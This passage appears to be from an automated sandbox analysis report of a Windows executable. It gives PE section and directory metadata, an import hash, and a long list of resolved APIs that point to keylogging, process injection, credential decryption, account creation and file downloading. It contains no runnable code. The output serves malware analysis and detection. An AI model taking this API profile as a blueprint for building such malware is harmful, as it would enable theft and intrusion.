  1004. "characteristics_raw": "0x40000040"
  1005. },
  1006. {
  1007. "name": ".data",
  1008. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1009. "virtual_address": "0x0003f000",
  1010. "size_of_data": "0x0004ee00",
  1011. "entropy": "6.08",
  1012. "raw_address": "0x0003d800",
  1013. "virtual_size": "0x0005045c",
  1014. "characteristics_raw": "0xc0000040"
  1015. },
  1016. {
  1017. "name": ".rsrc",
  1018. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1019. "virtual_address": "0x00090000",
  1020. "size_of_data": "0x00000600",
  1021. "entropy": "4.70",
  1022. "raw_address": "0x0008c600",
  1023. "virtual_size": "0x00000488",
  1024. "characteristics_raw": "0x40000040"
  1025. },
  1026. {
  1027. "name": ".reloc",
  1028. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1029. "virtual_address": "0x00091000",
  1030. "size_of_data": "0x00007a00",
  1031. "entropy": "6.45",
  1032. "raw_address": "0x0008cc00",
  1033. "virtual_size": "0x0000799c",
  1034. "characteristics_raw": "0x42000040"
  1035. }
  1036. ],
  1037. "resources": [],
  1038. "dirents": [
  1039. {
  1040. "virtual_address": "0x00000000",
  1041. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1042. "size": "0x00000000"
  1043. },
  1044. {
  1045. "virtual_address": "0x0003dc34",
  1046. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1047. "size": "0x000002bc"
  1048. },
  1049. {
  1050. "virtual_address": "0x00090000",
  1051. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1052. "size": "0x00000488"
  1053. },
  1054. {
  1055. "virtual_address": "0x00000000",
  1056. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1057. "size": "0x00000000"
  1058. },
  1059. {
  1060. "virtual_address": "0x00000000",
  1061. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1062. "size": "0x00000000"
  1063. },
  1064. {
  1065. "virtual_address": "0x00091000",
  1066. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1067. "size": "0x0000799c"
  1068. },
  1069. {
  1070. "virtual_address": "0x0003d520",
  1071. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1072. "size": "0x0000001c"
  1073. },
  1074. {
  1075. "virtual_address": "0x00000000",
  1076. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1077. "size": "0x00000000"
  1078. },
  1079. {
  1080. "virtual_address": "0x00000000",
  1081. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1082. "size": "0x00000000"
  1083. },
  1084. {
  1085. "virtual_address": "0x00000000",
  1086. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1087. "size": "0x00000000"
  1088. },
  1089. {
  1090. "virtual_address": "0x0003d540",
  1091. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1092. "size": "0x00000040"
  1093. },
  1094. {
  1095. "virtual_address": "0x00000000",
  1096. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1097. "size": "0x00000000"
  1098. },
  1099. {
  1100. "virtual_address": "0x00036000",
  1101. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1102. "size": "0x00000254"
  1103. },
  1104. {
  1105. "virtual_address": "0x00000000",
  1106. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1107. "size": "0x00000000"
  1108. },
  1109. {
  1110. "virtual_address": "0x00000000",
  1111. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1112. "size": "0x00000000"
  1113. },
  1114. {
  1115. "virtual_address": "0x00000000",
  1116. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1117. "size": "0x00000000"
  1118. }
  1119. ],
  1120. "exports": [],
  1121. "guest_signers": {},
  1122. "imphash": "c8503ab5366fc6e13552bba734a2de16",
  1123. "icon_fuzzy": null,
  1124. "icon": null,
  1125. "pdbpath": null,
  1126. "imported_dll_count": 34,
  1127. "versioninfo": []
  1128. }
  1129. }
  1130.  
  1131. [*] Resolved APIs: [
  1132. "kernel32.dll.InitializeCriticalSectionEx",
  1133. "kernel32.dll.FlsAlloc",
  1134. "kernel32.dll.FlsSetValue",
  1135. "kernel32.dll.FlsGetValue",
  1136. "kernel32.dll.LCMapStringEx",
  1137. "advapi32.dll.EventActivityIdControl",
  1138. "advapi32.dll.EventWriteTransfer",
  1139. "kernel32.dll.InitializeSRWLock",
  1140. "kernel32.dll.AcquireSRWLockExclusive",
  1141. "kernel32.dll.AcquireSRWLockShared",
  1142. "kernel32.dll.ReleaseSRWLockExclusive",
  1143. "kernel32.dll.ReleaseSRWLockShared",
  1144. "kernel32.dll.SortGetHandle",
  1145. "kernel32.dll.SortCloseHandle",
  1146. "kernel32.dll.SetFileInformationByHandle",
  1147. "shell32.dll.SHGetFolderPathW",
  1148. "kernel32.dll.GetModuleHandleW",
  1149. "advapi32.dll.AddMandatoryAce",
  1150. "ntmarta.dll.GetMartaExtensionInterface",
  1151. "ws2_32.dll.accept",
  1152. "ws2_32.dll.bind",
  1153. "ws2_32.dll.closesocket",
  1154. "ws2_32.dll.connect",
  1155. "ws2_32.dll.getpeername",
  1156. "ws2_32.dll.getsockname",
  1157. "ws2_32.dll.getsockopt",
  1158. "ws2_32.dll.ntohl",
  1159. "ws2_32.dll.htonl",
  1160. "ws2_32.dll.htons",
  1161. "ws2_32.dll.inet_addr",
  1162. "ws2_32.dll.inet_ntoa",
  1163. "ws2_32.dll.ioctlsocket",
  1164. "ws2_32.dll.listen",
  1165. "ws2_32.dll.ntohs",
  1166. "ws2_32.dll.recv",
  1167. "ws2_32.dll.recvfrom",
  1168. "ws2_32.dll.select",
  1169. "ws2_32.dll.send",
  1170. "ws2_32.dll.sendto",
  1171. "ws2_32.dll.setsockopt",
  1172. "ws2_32.dll.shutdown",
  1173. "ws2_32.dll.socket",
  1174. "ws2_32.dll.gethostbyname",
  1175. "ws2_32.dll.gethostname",
  1176. "ws2_32.dll.WSAIoctl",
  1177. "ws2_32.dll.WSAGetLastError",
  1178. "ws2_32.dll.WSASetLastError",
  1179. "ws2_32.dll.WSAStartup",
  1180. "ws2_32.dll.WSACleanup",
  1181. "ws2_32.dll.__WSAFDIsSet",
  1182. "ws2_32.dll.getaddrinfo",
  1183. "ws2_32.dll.freeaddrinfo",
  1184. "ws2_32.dll.getnameinfo",
  1185. "ws2_32.dll.WSALookupServiceBeginW",
  1186. "ws2_32.dll.WSALookupServiceNextW",
  1187. "ws2_32.dll.WSALookupServiceEnd",
  1188. "ws2_32.dll.WSANSPIoctl",
  1189. "ws2_32.dll.WSAStringToAddressA",
  1190. "ws2_32.dll.WSAStringToAddressW",
  1191. "ws2_32.dll.WSAAddressToStringA",
  1192. "dnsapi.dll.DnsGetProxyInformation",
  1193. "dnsapi.dll.DnsFreeProxyName",
  1194. "iphlpapi.dll.GetIpForwardTable2",
  1195. "iphlpapi.dll.FreeMibTable",
  1196. "iphlpapi.dll.GetIfEntry2",
  1197. "iphlpapi.dll.ConvertInterfaceGuidToLuid",
  1198. "iphlpapi.dll.ResolveIpNetEntry2",
  1199. "iphlpapi.dll.GetIpNetEntry2",
  1200. "shlwapi.dll.#260",
  1201. "rasapi32.dll.RasConnectionNotificationW",
  1202. "rasapi32.dll.RasEnumEntriesW",
  1203. "rtutils.dll.TracePrintfExA",
  1204. "sechost.dll.ConvertSidToStringSidW",
  1205. "profapi.dll.#104",
  1206. "shlwapi.dll.PathCanonicalizeW",
  1207. "shlwapi.dll.PathRemoveFileSpecW",
  1208. "shlwapi.dll.PathFindFileNameW",
  1209. "sechost.dll.NotifyServiceStatusChangeA",
  1210. "cryptbase.dll.SystemFunction036",
  1211. "sensapi.dll.IsNetworkAlive",
  1212. "rpcrt4.dll.RpcBindingFromStringBindingW",
  1213. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  1214. "rpcrt4.dll.NdrClientCall2",
  1215. "kernel32.dll.TerminateThread",
  1216. "kernel32.dll.CreateThread",
  1217. "kernel32.dll.WriteFile",
  1218. "kernel32.dll.CreateFileW",
  1219. "kernel32.dll.LoadLibraryW",
  1220. "kernel32.dll.GetLocalTime",
  1221. "kernel32.dll.GetCurrentThreadId",
  1222. "kernel32.dll.GetCurrentProcessId",
  1223. "kernel32.dll.ReadFile",
  1224. "kernel32.dll.FindFirstFileA",
  1225. "kernel32.dll.GetBinaryTypeW",
  1226. "kernel32.dll.FindNextFileA",
  1227. "kernel32.dll.GetFullPathNameA",
  1228. "kernel32.dll.GetTempPathW",
  1229. "kernel32.dll.GetPrivateProfileStringW",
  1230. "kernel32.dll.CreateFileA",
  1231. "kernel32.dll.GlobalAlloc",
  1232. "kernel32.dll.GetCurrentDirectoryW",
  1233. "kernel32.dll.SetCurrentDirectoryW",
  1234. "kernel32.dll.LocalFree",
  1235. "kernel32.dll.GetFileSize",
  1236. "kernel32.dll.FreeLibrary",
  1237. "kernel32.dll.WaitForSingleObject",
  1238. "kernel32.dll.GetCurrentProcess",
  1239. "kernel32.dll.WaitForMultipleObjects",
  1240. "kernel32.dll.CreatePipe",
  1241. "kernel32.dll.PeekNamedPipe",
  1242. "kernel32.dll.DuplicateHandle",
  1243. "kernel32.dll.SetEvent",
  1244. "kernel32.dll.CreateProcessW",
  1245. "kernel32.dll.CreateEventA",
  1246. "kernel32.dll.GetModuleFileNameW",
  1247. "kernel32.dll.LoadResource",
  1248. "kernel32.dll.FindResourceW",
  1249. "kernel32.dll.HeapFree",
  1250. "kernel32.dll.LoadLibraryExW",
  1251. "kernel32.dll.FindFirstFileW",
  1252. "kernel32.dll.FindNextFileW",
  1253. "kernel32.dll.SetFilePointer",
  1254. "kernel32.dll.GetLogicalDriveStringsW",
  1255. "kernel32.dll.DeleteFileW",
  1256. "kernel32.dll.VirtualQuery",
  1257. "kernel32.dll.GetDriveTypeW",
  1258. "kernel32.dll.EnterCriticalSection",
  1259. "kernel32.dll.LeaveCriticalSection",
  1260. "kernel32.dll.InitializeCriticalSection",
  1261. "kernel32.dll.DeleteCriticalSection",
  1262. "kernel32.dll.CreateMutexA",
  1263. "kernel32.dll.ReleaseMutex",
  1264. "kernel32.dll.TerminateProcess",
  1265. "kernel32.dll.OpenProcess",
  1266. "kernel32.dll.CreateToolhelp32Snapshot",
  1267. "kernel32.dll.Process32NextW",
  1268. "kernel32.dll.Process32FirstW",
  1269. "kernel32.dll.CreateProcessA",
  1270. "kernel32.dll.SizeofResource",
  1271. "kernel32.dll.VirtualProtect",
  1272. "kernel32.dll.GetSystemDirectoryW",
  1273. "kernel32.dll.LockResource",
  1274. "kernel32.dll.GetWindowsDirectoryW",
  1275. "kernel32.dll.IsWow64Process",
  1276. "kernel32.dll.GetStartupInfoA",
  1277. "kernel32.dll.Process32First",
  1278. "kernel32.dll.WriteProcessMemory",
  1279. "kernel32.dll.Process32Next",
  1280. "kernel32.dll.GetWindowsDirectoryA",
  1281. "kernel32.dll.VirtualProtectEx",
  1282. "kernel32.dll.VirtualAllocEx",
  1283. "kernel32.dll.CreateRemoteThread",
  1284. "kernel32.dll.WinExec",
  1285. "kernel32.dll.GetTempPathA",
  1286. "kernel32.dll.GetCommandLineA",
  1287. "kernel32.dll.GetModuleHandleA",
  1288. "kernel32.dll.ExitProcess",
  1289. "kernel32.dll.GetProcAddress",
  1290. "kernel32.dll.LoadLibraryA",
  1291. "kernel32.dll.GetProcessHeap",
  1292. "kernel32.dll.HeapAlloc",
  1293. "kernel32.dll.lstrcmpW",
  1294. "kernel32.dll.GetTickCount",
  1295. "kernel32.dll.lstrcpyW",
  1296. "kernel32.dll.HeapReAlloc",
  1297. "kernel32.dll.VirtualAlloc",
  1298. "kernel32.dll.CopyFileW",
  1299. "kernel32.dll.WideCharToMultiByte",
  1300. "kernel32.dll.lstrcpyA",
  1301. "kernel32.dll.Sleep",
  1302. "kernel32.dll.MultiByteToWideChar",
  1303. "kernel32.dll.lstrcatA",
  1304. "kernel32.dll.lstrcmpA",
  1305. "kernel32.dll.lstrlenA",
  1306. "kernel32.dll.ExpandEnvironmentStringsW",
  1307. "kernel32.dll.lstrlenW",
  1308. "kernel32.dll.CloseHandle",
  1309. "kernel32.dll.VirtualFree",
  1310. "kernel32.dll.lstrcatW",
  1311. "kernel32.dll.GetLastError",
  1312. "kernel32.dll.SetLastError",
  1313. "kernel32.dll.GetModuleFileNameA",
  1314. "kernel32.dll.CreateDirectoryW",
  1315. "kernel32.dll.GetComputerNameW",
  1316. "user32.dll.MessageBoxA",
  1317. "user32.dll.GetKeyState",
  1318. "user32.dll.GetMessageA",
  1319. "user32.dll.DispatchMessageA",
  1320. "user32.dll.CreateWindowExW",
  1321. "user32.dll.CallNextHookEx",
  1322. "user32.dll.GetAsyncKeyState",
  1323. "user32.dll.wsprintfW",
  1324. "user32.dll.wsprintfA",
  1325. "user32.dll.GetLastInputInfo",
  1326. "user32.dll.GetWindowTextW",
  1327. "user32.dll.RegisterClassW",
  1328. "user32.dll.GetRawInputData",
  1329. "user32.dll.TranslateMessage",
  1330. "user32.dll.GetForegroundWindow",
  1331. "user32.dll.DefWindowProcA",
  1332. "user32.dll.RegisterRawInputDevices",
  1333. "user32.dll.MapVirtualKeyA",
  1334. "user32.dll.ToUnicode",
  1335. "user32.dll.GetKeyNameTextW",
  1336. "user32.dll.PostQuitMessage",
  1337. "advapi32.dll.RegDeleteKeyA",
  1338. "advapi32.dll.InitializeSecurityDescriptor",
  1339. "advapi32.dll.RegDeleteKeyW",
  1340. "advapi32.dll.RegEnumKeyExW",
  1341. "advapi32.dll.RegOpenKeyExA",
  1342. "advapi32.dll.RegOpenKeyExW",
  1343. "advapi32.dll.RegQueryValueExW",
  1344. "advapi32.dll.SetSecurityDescriptorDacl",
  1345. "advapi32.dll.RegQueryInfoKeyW",
  1346. "advapi32.dll.RegCloseKey",
  1347. "advapi32.dll.OpenServiceW",
  1348. "advapi32.dll.ChangeServiceConfigW",
  1349. "advapi32.dll.QueryServiceConfigW",
  1350. "advapi32.dll.EnumServicesStatusExW",
  1351. "advapi32.dll.StartServiceW",
  1352. "advapi32.dll.RegSetValueExW",
  1353. "advapi32.dll.RegCreateKeyExA",
  1354. "advapi32.dll.OpenSCManagerW",
  1355. "advapi32.dll.CloseServiceHandle",
  1356. "advapi32.dll.GetTokenInformation",
  1357. "advapi32.dll.LookupAccountSidW",
  1358. "advapi32.dll.FreeSid",
  1359. "advapi32.dll.OpenProcessToken",
  1360. "advapi32.dll.AllocateAndInitializeSid",
  1361. "advapi32.dll.AdjustTokenPrivileges",
  1362. "advapi32.dll.LookupPrivilegeValueW",
  1363. "advapi32.dll.RegDeleteValueW",
  1364. "advapi32.dll.RegSetValueExA",
  1365. "advapi32.dll.RegCreateKeyExW",
  1366. "advapi32.dll.RegQueryValueExA",
  1367. "shell32.dll.ShellExecuteExA",
  1368. "shell32.dll.ShellExecuteExW",
  1369. "shell32.dll.SHGetSpecialFolderPathW",
  1370. "shell32.dll.SHCreateDirectoryExW",
  1371. "shell32.dll.ShellExecuteW",
  1372. "urlmon.dll.URLDownloadToFileW",
  1373. "ole32.dll.CoInitialize",
  1374. "ole32.dll.CoCreateInstance",
  1375. "ole32.dll.CoTaskMemFree",
  1376. "ole32.dll.CoUninitialize",
  1377. "shlwapi.dll.StrStrA",
  1378. "shlwapi.dll.StrStrW",
  1379. "shlwapi.dll.PathFindExtensionW",
  1380. "shlwapi.dll.PathCombineA",
  1381. "shlwapi.dll.PathFileExistsW",
  1382. "shlwapi.dll.PathRemoveFileSpecA",
  1383. "netapi32.dll.NetUserAdd",
  1384. "netapi32.dll.NetLocalGroupAddMembers",
  1385. "crypt32.dll.CryptStringToBinaryA",
  1386. "crypt32.dll.CryptUnprotectData",
  1387. "psapi.dll.GetModuleFileNameExW",
  1388. "wininet.dll.InternetQueryDataAvailable",
  1389. "wininet.dll.InternetOpenUrlW",
  1390. "wininet.dll.InternetOpenW",
  1391. "wininet.dll.InternetCloseHandle",
  1392. "wininet.dll.InternetReadFile",
  1393. "wininet.dll.InternetCheckConnectionW",
  1394. "uxtheme.dll.ThemeInitApiHook",
  1395. "user32.dll.IsProcessDPIAware",
  1396. "wintrust.dll.WinVerifyTrust",
  1397. "msdmo.dll.DMOEnum",
  1398. "msdmo.dll.DMOGetTypes",
  1399. "msdmo.dll.DMOGetName",
  1400. "avicap32.dll.capGetDriverDescriptionW",
  1401. "ole32.dll.CoTaskMemAlloc",
  1402. "ole32.dll.CoInitializeEx",
  1403. "ole32.dll.CreateBindCtx",
  1404. "ole32.dll.CoGetApartmentType",
  1405. "ole32.dll.CoRegisterInitializeSpy",
  1406. "comctl32.dll.#236",
  1407. "oleaut32.dll.#6",
  1408. "ole32.dll.CoGetMalloc",
  1409. "comctl32.dll.#320",
  1410. "comctl32.dll.#324",
  1411. "comctl32.dll.#323",
  1412. "advapi32.dll.RegEnumKeyW",
  1413. "oleaut32.dll.#2",
  1414. "ole32.dll.CoRevokeInitializeSpy",
  1415. "comctl32.dll.#388",
  1416. "oleaut32.dll.#500",
  1417. "rpcrt4.dll.RpcBindingFree",
  1418. "advapi32.dll.UnregisterTraceGuids",
  1419. "oleaut32.dll.#9",
  1420. "comctl32.dll.#321",
  1421. "shell32.dll.#66",
  1422. "advapi32.dll.SetEntriesInAclW",
  1423. "advapi32.dll.IsTextUnicode",
  1424. "comctl32.dll.#332",
  1425. "comctl32.dll.#338",
  1426. "comctl32.dll.#339",
  1427. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  1428. "shell32.dll.#102",
  1429. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  1430. "comctl32.dll.#386",
  1431. "apphelp.dll.ApphelpCheckShellObject",
  1432. "comctl32.dll.#385",
  1433. "comctl32.dll.#336",
  1434. "comctl32.dll.#329",
  1435. "comctl32.dll.#333",
  1436. "ntdll.dll.RtlDllShutdownInProgress",
  1437. "propsys.dll.PSCreateMemoryPropertyStore",
  1438. "linkinfo.dll.CreateLinkInfoW",
  1439. "user32.dll.IsCharAlphaW",
  1440. "user32.dll.CharPrevW",
  1441. "ntshrui.dll.GetNetResourceFromLocalPathW",
  1442. "srvcli.dll.NetShareEnum",
  1443. "cscapi.dll.CscNetApiGetInterface",
  1444. "slc.dll.SLGetWindowsInformationDWORD",
  1445. "linkinfo.dll.DestroyLinkInfo",
  1446. "propsys.dll.PropVariantToBoolean",
  1447. "ole32.dll.PropVariantClear",
  1448. "cryptsp.dll.CryptAcquireContextW",
  1449. "cryptsp.dll.CryptGenRandom",
  1450. "cryptsp.dll.CryptReleaseContext",
  1451. "advapi32.dll.RegEnumValueW",
  1452. "kernel32.dll.QueryActCtxW",
  1453. "shlwapi.dll.UrlIsW",
  1454. "kernel32.dll.FlsFree",
  1455. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  1456. "kernel32.dll.IsProcessorFeaturePresent",
  1457. "msvcrt.dll._set_error_mode",
  1458. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
  1459. "kernel32.dll.FindActCtxSectionStringW",
  1460. "kernel32.dll.GetSystemWindowsDirectoryW",
  1461. "mscoree.dll.GetProcessExecutableHeap",
  1462. "mscorwks.dll.DllGetClassObjectInternal",
  1463. "mscorwks.dll.GetCLRFunction",
  1464. "advapi32.dll.RegisterTraceGuidsW",
  1465. "advapi32.dll.GetTraceLoggerHandle",
  1466. "advapi32.dll.GetTraceEnableLevel",
  1467. "advapi32.dll.GetTraceEnableFlags",
  1468. "advapi32.dll.TraceEvent",
  1469. "mscoree.dll.IEE",
  1470. "mscorwks.dll.IEE",
  1471. "mscoree.dll.GetStartupFlags",
  1472. "mscoree.dll.GetHostConfigurationFile",
  1473. "mscoree.dll.GetCORSystemDirectory",
  1474. "ntdll.dll.RtlUnwind",
  1475. "advapi32.dll.InitializeAcl",
  1476. "advapi32.dll.AddAccessAllowedAce",
  1477. "kernel32.dll.SetThreadStackGuarantee",
  1478. "kernel32.dll.AddVectoredContinueHandler",
  1479. "kernel32.dll.RemoveVectoredContinueHandler",
  1480. "advapi32.dll.ConvertSidToStringSidW",
  1481. "kernel32.dll.FlushProcessWriteBuffers",
  1482. "kernel32.dll.GetWriteWatch",
  1483. "kernel32.dll.ResetWriteWatch",
  1484. "kernel32.dll.CreateMemoryResourceNotification",
  1485. "kernel32.dll.QueryMemoryResourceNotification",
  1486. "mscoree.dll._CorExeMain",
  1487. "mscoree.dll._CorImageUnloading",
  1488. "mscoree.dll._CorValidateImage",
  1489. "oleaut32.dll.#149",
  1490. "kernel32.dll.GetUserDefaultUILanguage",
  1491. "ole32.dll.CoGetContextToken",
  1492. "kernel32.dll.GetVersionExW",
  1493. "kernel32.dll.GetFullPathNameW",
  1494. "kernel32.dll.SetErrorMode",
  1495. "kernel32.dll.GetFileAttributesExW",
  1496. "version.dll.GetFileVersionInfoSizeW",
  1497. "version.dll.GetFileVersionInfoW",
  1498. "version.dll.VerQueryValueW",
  1499. "kernel32.dll.lstrlen",
  1500. "mscoree.dll.ND_RI2",
  1501. "kernel32.dll.lstrcpy",
  1502. "version.dll.VerLanguageNameW",
  1503. "psapi.dll.EnumProcessModules",
  1504. "psapi.dll.GetModuleInformation",
  1505. "psapi.dll.GetModuleBaseNameW",
  1506. "kernel32.dll.GetExitCodeProcess",
  1507. "ntdll.dll.NtQuerySystemInformation",
  1508. "user32.dll.EnumWindows",
  1509. "user32.dll.GetWindowThreadProcessId",
  1510. "user32.dll.GetWindow",
  1511. "user32.dll.IsWindowVisible",
  1512. "kernel32.dll.WerSetFlags",
  1513. "kernel32.dll.SetThreadPreferredUILanguages",
  1514. "kernel32.dll.GetThreadPreferredUILanguages",
  1515. "kernel32.dll.GetUserDefaultLocaleName",
  1516. "kernel32.dll.GetEnvironmentVariableW",
  1517. "advapi32.dll.CryptAcquireContextA",
  1518. "advapi32.dll.CryptReleaseContext",
  1519. "advapi32.dll.CryptCreateHash",
  1520. "advapi32.dll.CryptDestroyHash",
  1521. "advapi32.dll.CryptHashData",
  1522. "advapi32.dll.CryptGetHashParam",
  1523. "advapi32.dll.CryptImportKey",
  1524. "advapi32.dll.CryptExportKey",
  1525. "advapi32.dll.CryptGenKey",
  1526. "advapi32.dll.CryptGetKeyParam",
  1527. "advapi32.dll.CryptDestroyKey",
  1528. "advapi32.dll.CryptVerifySignatureA",
  1529. "advapi32.dll.CryptSignHashA",
  1530. "advapi32.dll.CryptGetProvParam",
  1531. "advapi32.dll.CryptGetUserKey",
  1532. "advapi32.dll.CryptEnumProvidersA",
  1533. "cryptsp.dll.CryptAcquireContextA",
  1534. "cryptsp.dll.CryptImportKey",
  1535. "cryptsp.dll.CryptExportKey",
  1536. "cryptsp.dll.CryptCreateHash",
  1537. "cryptsp.dll.CryptHashData",
  1538. "cryptsp.dll.CryptGetHashParam",
  1539. "cryptsp.dll.CryptDestroyHash",
  1540. "cryptsp.dll.CryptDestroyKey",
  1541. "mscoree.dll.GetTokenForVTableEntry",
  1542. "mscoree.dll.SetTargetForVTableEntry",
  1543. "mscoree.dll.GetTargetForVTableEntry",
  1544. "culture.dll.ConvertLangIdToCultureName",
  1545. "ole32.dll.CoCreateGuid",
  1546. "kernel32.dll.GetConsoleScreenBufferInfo",
  1547. "kernel32.dll.LocalAlloc",
  1548. "mscoree.dll.ND_RI4",
  1549. "advapi32.dll.DuplicateTokenEx",
  1550. "advapi32.dll.CheckTokenMembership",
  1551. "kernel32.dll.GetConsoleTitleW",
  1552. "kernel32.dll.SetConsoleTitleW",
  1553. "kernel32.dll.SetConsoleCtrlHandler",
  1554. "kernel32.dll.CreateEventW",
  1555. "ntdll.dll.WinSqmIsOptedIn",
  1556. "shfolder.dll.SHGetFolderPathW",
  1557. "kernel32.dll.SetEnvironmentVariableW",
  1558. "kernel32.dll.GetACP",
  1559. "kernel32.dll.UnmapViewOfFile",
  1560. "kernel32.dll.GetFileType",
  1561. "kernel32.dll.GetSystemInfo",
  1562. "kernel32.dll.SwitchToThread",
  1563. "kernel32.dll.GlobalMemoryStatusEx",
  1564. "secur32.dll.GetUserNameExW",
  1565. "advapi32.dll.GetUserNameW",
  1566. "advapi32.dll.RegisterEventSourceW",
  1567. "advapi32.dll.DeregisterEventSource",
  1568. "advapi32.dll.ReportEventW",
  1569. "kernel32.dll.GetLogicalDrives",
  1570. "kernel32.dll.GetVolumeInformationW",
  1571. "mscorjit.dll.getJit",
  1572. "kernel32.dll.GetStdHandle",
  1573. "kernel32.dll.GetConsoleMode",
  1574. "kernel32.dll.SetThreadUILanguage",
  1575. "kernel32.dll.FindClose",
  1576. "mscoree.dll.DllGetClassObject",
  1577. "diasymreader.dll.DllGetClassObjectInternal",
  1578. "kernel32.dll.GetConsoleOutputCP",
  1579. "gdi32.dll.TranslateCharsetInfo",
  1580. "kernel32.dll.SetConsoleTextAttribute",
  1581. "kernel32.dll.WriteConsoleW",
  1582. "mscoree.dll.CorExitProcess",
  1583. "mscorwks.dll.CorExitProcess",
  1584. "mscorwks.dll._CorDllMain",
  1585. "kernel32.dll.CreateActCtxW",
  1586. "kernel32.dll.AddRefActCtx",
  1587. "kernel32.dll.ReleaseActCtx",
  1588. "kernel32.dll.ActivateActCtx",
  1589. "kernel32.dll.DeactivateActCtx",
  1590. "kernel32.dll.GetCurrentActCtx",
  1591. "netutils.dll.NetApiBufferFree",
  1592. "rtutils.dll.TraceRegisterExA",
  1593. "ntdll.dll.RtlGetVersion",
  1594. "ntdll.dll.NtOpenKey",
  1595. "ntdll.dll.wcscat_s",
  1596. "ntdll.dll.wcscpy_s",
  1597. "ntdll.dll.NtEnumerateKey",
  1598. "ntdll.dll.RtlOpenCurrentUser",
  1599. "ntdll.dll.RtlFreeHeap",
  1600. "ntdll.dll.RtlAllocateHeap",
  1601. "ntdll.dll.memcpy",
  1602. "ntdll.dll.memset",
  1603. "ntdll.dll.RtlEnterCriticalSection",
  1604. "ntdll.dll.RtlLeaveCriticalSection",
  1605. "ntdll.dll.RtlUnicodeToMultiByteN",
  1606. "ntdll.dll.RtlMultiByteToUnicodeN",
  1607. "ntdll.dll.RtlReleaseActivationContext",
  1608. "ntdll.dll.RtlFindActivationContextSectionString",
  1609. "ntdll.dll.RtlDeactivateActivationContextUnsafeFast",
  1610. "ntdll.dll.RtlActivateActivationContextUnsafeFast",
  1611. "ntdll.dll.wcstol",
  1612. "ntdll.dll.NtQueryInformationProcess",
  1613. "ntdll.dll.NtQuerySecurityObject",
  1614. "ntdll.dll.NtSetSecurityObject",
  1615. "ntdll.dll.RtlFreeUnicodeString",
  1616. "ntdll.dll.RtlAnsiStringToUnicodeString",
  1617. "ntdll.dll.RtlInitAnsiString",
  1618. "ntdll.dll.RtlCreateUnicodeStringFromAsciiz",
  1619. "ntdll.dll.RtlQueryInformationActiveActivationContext",
  1620. "ntdll.dll._vsnwprintf",
  1621. "ntdll.dll.NtVdmControl",
  1622. "ntdll.dll.wcstoul",
  1623. "ntdll.dll.NtOpenDirectoryObject",
  1624. "ntdll.dll.NtDeleteValueKey",
  1625. "ntdll.dll.NtSetValueKey",
  1626. "ntdll.dll.NtCreateKey",
  1627. "ntdll.dll.NtYieldExecution",
  1628. "ntdll.dll.RtlIsThreadWithinLoaderCallout",
  1629. "ntdll.dll._wcsicmp",
  1630. "ntdll.dll._stricmp",
  1631. "ntdll.dll.RtlGetIntegerAtom",
  1632. "ntdll.dll.NtProtectVirtualMemory",
  1633. "ntdll.dll.RtlRetrieveNtUserPfn",
  1634. "ntdll.dll.RtlInitializeNtUserPfn",
  1635. "ntdll.dll.RtlDeleteCriticalSection",
  1636. "ntdll.dll.RtlInitializeCriticalSection",
  1637. "ntdll.dll._allshr",
  1638. "ntdll.dll.RtlUnicodeToMultiByteSize",
  1639. "ntdll.dll._allmul",
  1640. "ntdll.dll.NtCallbackReturn",
  1641. "ntdll.dll._chkstk",
  1642. "ntdll.dll.memmove",
  1643. "ntdll.dll.NtQueryInformationToken",
  1644. "ntdll.dll.NtOpenProcessToken",
  1645. "ntdll.dll.NtOpenThreadToken",
  1646. "ntdll.dll.RtlNtStatusToDosError",
  1647. "ntdll.dll.CsrClientCallServer",
  1648. "ntdll.dll.CsrFreeCaptureBuffer",
  1649. "ntdll.dll.CsrCaptureMessageBuffer",
  1650. "ntdll.dll.CsrAllocateCaptureBuffer",
  1651. "ntdll.dll.RtlFreeSid",
  1652. "ntdll.dll.RtlAllocateAndInitializeSid",
  1653. "ntdll.dll.CsrAllocateMessagePointer",
  1654. "ntdll.dll.RtlReAllocateHeap",
  1655. "ntdll.dll.RtlRunDecodeUnicodeString",
  1656. "ntdll.dll.RtlRunEncodeUnicodeString",
  1657. "ntdll.dll.RtlGetThreadLangIdByIndex",
  1658. "ntdll.dll.RtlSizeHeap",
  1659. "ntdll.dll.strcpy_s",
  1660. "ntdll.dll.sscanf_s",
  1661. "ntdll.dll.strrchr",
  1662. "ntdll.dll.RtlIsNameLegalDOS8Dot3",
  1663. "ntdll.dll.wcsncat_s",
  1664. "ntdll.dll.NtRaiseHardError",
  1665. "ntdll.dll.RtlMultiByteToUnicodeSize",
  1666. "ntdll.dll.RtlCheckRegistryKey",
  1667. "ntdll.dll.LdrFlushAlternateResourceModules",
  1668. "ntdll.dll.qsort",
  1669. "ntdll.dll.iswspace",
  1670. "ntdll.dll.wcsncpy_s",
  1671. "ntdll.dll.wcsrchr",
  1672. "ntdll.dll._alldiv",
  1673. "ntdll.dll._wtoi",
